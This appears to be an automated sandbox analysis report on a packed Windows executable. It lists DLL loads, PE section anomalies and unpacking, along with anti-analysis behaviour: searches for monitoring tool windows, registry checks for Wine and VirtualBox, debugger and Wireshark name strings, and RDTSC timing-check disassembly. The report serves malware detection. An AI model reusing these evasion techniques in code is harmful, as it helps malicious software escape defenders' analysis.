Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: kernel.appcore.dllJump to behavior
Source: 5Jat5RkD3a.exeStatic file information: File size 4449280 > 1048576
Source: 5Jat5RkD3a.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: 5Jat5RkD3a.exeStatic PE information: Raw size of pvfmcbmp is bigger than: 0x100000 < 0x1b7200

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeUnpacked PE file: 0.2.5Jat5RkD3a.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pvfmcbmp:EW;qfezismy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pvfmcbmp:EW;qfezismy:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 5Jat5RkD3a.exeStatic PE information: real checksum: 0x44aba3 should be: 0x43fa26
Source: 5Jat5RkD3a.exeStatic PE information: section name:
Source: 5Jat5RkD3a.exeStatic PE information: section name: .idata
Source: 5Jat5RkD3a.exeStatic PE information: section name:
Source: 5Jat5RkD3a.exeStatic PE information: section name: pvfmcbmp
Source: 5Jat5RkD3a.exeStatic PE information: section name: qfezismy
Source: 5Jat5RkD3a.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017D7351 push eax; iretd 0_3_017D739D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017D7351 push eax; iretd 0_3_017D739D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017D7340 push eax; retf 0_3_017D7341
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017D7340 push eax; retf 0_3_017D7341
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCBE2 push eax; iretd 0_3_017DCC01
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCBE2 push eax; iretd 0_3_017DCC01
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCA60 pushfd ; iretd 0_3_017DCA61
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCA60 pushfd ; iretd 0_3_017DCA61
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DAC10 push edx; ret 0_3_017DAC11
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DAC10 push edx; ret 0_3_017DAC11
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCC02 push esp; iretd 0_3_017DCC21
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCC02 push esp; iretd 0_3_017DCC21
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCCE2 pushad ; iretd 0_3_017DCD81
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCCE2 pushad ; iretd 0_3_017DCD81
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017E6AD5 push es; iretd 0_3_017E6AD7
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017E6AD5 push es; iretd 0_3_017E6AD7
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017D7351 push eax; iretd 0_3_017D739D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017D7351 push eax; iretd 0_3_017D739D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017D7340 push eax; retf 0_3_017D7341
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017D7340 push eax; retf 0_3_017D7341
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCBE2 push eax; iretd 0_3_017DCC01
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCBE2 push eax; iretd 0_3_017DCC01
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCA60 pushfd ; iretd 0_3_017DCA61
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCA60 pushfd ; iretd 0_3_017DCA61
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DAC10 push edx; ret 0_3_017DAC11
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DAC10 push edx; ret 0_3_017DAC11
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCC02 push esp; iretd 0_3_017DCC21
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCC02 push esp; iretd 0_3_017DCC21
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCCE2 pushad ; iretd 0_3_017DCD81
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017DCCE2 pushad ; iretd 0_3_017DCD81
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_3_017E6AD5 push es; iretd 0_3_017E6AD7
Source: 5Jat5RkD3a.exeStatic PE information: section name: pvfmcbmp entropy: 7.95605426603415

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1E0C6 second address: B1E0CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1E0CA second address: B1E0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD934BC97D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD934BC97E2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1D4F5 second address: B1D4FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1D924 second address: B1D928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20451 second address: B20455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20455 second address: B2045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B2045B second address: B20465 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD934C4561Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20465 second address: B2048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007FD934BC97DEh 0x0000000d push esi 0x0000000e jp 00007FD934BC97D6h 0x00000014 pop esi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jno 00007FD934BC97DCh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B2048C second address: B20493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20493 second address: B204B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007FD934BC97E6h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B204B6 second address: B204BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B204BB second address: B204C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B204FE second address: B2053E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jp 00007FD934C4562Dh 0x0000000e push esi 0x0000000f jmp 00007FD934C45625h 0x00000014 pop esi 0x00000015 nop 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov ebx, dword ptr [ebp+122D1C65h] 0x0000001f add eax, 095DAEA1h 0x00000025 popad 0x00000026 push 2BECB199h 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B2053E second address: B20542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20542 second address: B20546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20546 second address: B205AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 xor dword ptr [esp], 2BECB119h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FD934BC97D8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3244h], ebx 0x0000002e add esi, dword ptr [ebp+122D2B42h] 0x00000034 push 00000003h 0x00000036 mov dx, cx 0x00000039 movzx ecx, cx 0x0000003c push 00000000h 0x0000003e mov ecx, 11196BA6h 0x00000043 pushad 0x00000044 mov edx, dword ptr [ebp+122D17DEh] 0x0000004a add eax, dword ptr [ebp+122D2936h] 0x00000050 popad 0x00000051 push 00000003h 0x00000053 sub di, 4542h 0x00000058 push 8496F0F1h 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B205AD second address: B205B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B207AA second address: B207AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B207AE second address: B207B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B207B8 second address: B207BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B33664 second address: B33668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B13D54 second address: B13D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B13D5E second address: B13D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EDD9 second address: B3EDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EDE1 second address: B3EDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EDE5 second address: B3EDF9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD934BC97D6h 0x00000008 jnl 00007FD934BC97D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EDF9 second address: B3EE2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934C45620h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EE2B second address: B3EE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EF98 second address: B3EFBA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD934C4561Eh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jbe 00007FD934C45616h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EFBA second address: B3EFE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007FD934BC97E8h 0x0000000c popad 0x0000000d js 00007FD934BC97DEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F13C second address: B3F154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C45622h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F154 second address: B3F16C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F16C second address: B3F178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F2EF second address: B3F2F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F43C second address: B3F448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FD934C45616h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F448 second address: B3F44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F702 second address: B3F73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD934C4561Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007FD934C4561Fh 0x00000016 jnc 00007FD934C4561Ch 0x0000001c popad 0x0000001d push edi 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F9FB second address: B3F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F9FF second address: B3FA03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3FA03 second address: B3FA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD934BC97D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3FA0F second address: B3FA43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45622h 0x00000007 jnp 00007FD934C45622h 0x0000000d jns 00007FD934C45616h 0x00000013 jl 00007FD934C45616h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007FD934C45616h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3FA43 second address: B3FA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3FA47 second address: B3FA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B34C91 second address: B34CB0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD934BC97D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FD934BC97E1h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B34CB0 second address: B34CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B403AC second address: B403B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B403B0 second address: B403C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jne 00007FD934C45616h 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B403C7 second address: B403CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B403CD second address: B40404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007FD934C45618h 0x0000000b popad 0x0000000c jo 00007FD934C45658h 0x00000012 push edi 0x00000013 jmp 00007FD934C45629h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FD934C45616h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B40810 second address: B40817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B46ED7 second address: B46EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007FD934C4561Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4854C second address: B48564 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD934BC97DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B48564 second address: B4857B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45623h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4857B second address: B48581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B48581 second address: B48585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D808 second address: B4D817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D817 second address: B4D82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45624h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4CC8B second address: B4CC92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4CC92 second address: B4CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 jl 00007FD934C45616h 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 je 00007FD934C45616h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4CCAF second address: B4CCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4CCB5 second address: B4CCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D05C second address: B4D060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
